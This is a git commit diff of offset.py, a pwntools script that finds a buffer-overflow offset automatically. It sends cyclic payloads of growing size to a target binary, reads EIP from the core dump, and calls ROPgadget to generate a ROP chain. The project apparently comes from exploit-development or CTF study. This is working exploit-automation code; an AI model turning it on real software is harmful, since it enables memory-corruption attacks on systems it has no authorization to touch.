Cat, argparse, payload sizes, more graceful errors
Co-authored-by: Chris Gora <34940205+ChrisGora@users.noreply.github.com> Co-authored-by: jack bond-preston <jackbondpreston@outlook.com>
This commit is contained in:
parent
5f8099dde0
commit
99cb451194
66
offset.py
66
offset.py
@ -1,41 +1,69 @@
|
|||||||
from pwnlib.elf.corefile import Coredump
|
from pwnlib.elf.corefile import Coredump
|
||||||
from pwnlib.util.cyclic import cyclic, cyclic_find
|
from pwnlib.util.cyclic import cyclic, cyclic_find
|
||||||
from pwnlib.util.packing import pack
|
from pwnlib.util.packing import pack
|
||||||
from pwnlib.tubes.process import process
|
from pwnlib.tubes.process import process, signal
|
||||||
|
|
||||||
import os
|
import os
|
||||||
import subprocess
|
import subprocess
|
||||||
|
import argparse
|
||||||
|
import warnings
|
||||||
|
import ROPgadget.ropgadget
|
||||||
|
|
||||||
exec_name = "./vuln-32"
|
print(r'''
|
||||||
|
_ ___ _.--. ___ _____ ______ _____ ______ ______
|
||||||
|
\`.|\..----...-'` `-._.-'_.-'` / _ \ / ____| /\ |____ / ____| /\ | ____| ____|
|
||||||
|
/ ' ` , __.--' | | | |_ _| | / \ / / | / \ | |__ | |__
|
||||||
|
)/' _/ \ `-_, / | | | \ \/ / | / /\ \ / /| | / /\ \ | __| | __|
|
||||||
|
`-'" `"\_ ,_.-;_.-\_ ', | |_| |> <| |____ / ____ \ / / | |____ / ____ \| | | |____
|
||||||
|
_.-'_./ {_.' ; / \___//_/\_\\_____/_/ \_\/_/ \_____/_/ \_\_| |______|
|
||||||
|
{_.-``-' {_/
|
||||||
|
''')
|
||||||
|
|
||||||
def find_offset(exec_name):
|
arg_parser = argparse.ArgumentParser(description="Run an automated ROP on an executable")
|
||||||
# TODO: command line arguments
|
arg_parser.add_argument("exec_file", metavar="exec_file", type=str, help="The executable file to exploit")
|
||||||
|
arg_parser.add_argument("--core", "--c", metavar="core_file", type=str, help="The name of the generated core file")
|
||||||
|
args = arg_parser.parse_args()
|
||||||
|
|
||||||
|
exec_file = args.exec_file
|
||||||
|
core_file = args.core
|
||||||
|
|
||||||
|
def find_offset(exec_file, core_file):
|
||||||
input_file = "input.txt"
|
input_file = "input.txt"
|
||||||
core_file = "./core"
|
|
||||||
|
|
||||||
os.remove(core_file)
|
try:
|
||||||
|
os.remove(core_file)
|
||||||
|
except:
|
||||||
|
pass
|
||||||
|
|
||||||
# TODO Loop until a crash, increase payload size each iteration
|
payload_size = 32
|
||||||
with open(input_file, "wb") as f:
|
while payload_size <= 16384:
|
||||||
payload = cyclic(512)
|
print(f"[🤔] Trying payload {payload_size}...")
|
||||||
f.write(payload)
|
|
||||||
|
|
||||||
process([exec_name, input_file]).wait()
|
with open(input_file, "wb") as f:
|
||||||
|
payload = cyclic(payload_size)
|
||||||
|
f.write(payload)
|
||||||
|
|
||||||
core = Coredump('./core')
|
process([f"./{exec_file}", input_file]).wait()
|
||||||
|
|
||||||
assert pack(core.eip) in payload
|
try:
|
||||||
|
core = Coredump(f"./{core_file}")
|
||||||
|
|
||||||
os.remove(input_file)
|
if core and pack(core.eip) in payload:
|
||||||
|
offset = cyclic_find(core.eip)
|
||||||
|
print(f"[😳] Found offset at {offset}!")
|
||||||
|
return offset
|
||||||
|
except FileNotFoundError:
|
||||||
|
pass
|
||||||
|
|
||||||
return cyclic_find(core.eip)
|
os.remove(input_file)
|
||||||
|
payload_size *= 2
|
||||||
|
|
||||||
offset = find_offset(exec_name)
|
raise BaseException("Failed to find offset")
|
||||||
|
|
||||||
# print("\t# Padding goes here") <-- search for this
|
|
||||||
# print("\tp = ''\n")
|
|
||||||
|
|
||||||
result = subprocess.run(["ROPgadget", "--binary", exec_name, "--ropchain"], stdout=subprocess.PIPE)
|
offset = find_offset(exec_file, core_file)
|
||||||
|
|
||||||
|
result = subprocess.run(["ROPgadget", "--binary", exec_file, "--ropchain"], stdout=subprocess.PIPE)
|
||||||
stdout = result.stdout
|
stdout = result.stdout
|
||||||
|
|
||||||
|
|
||||||
|
Loading…
Reference in New Issue
Block a user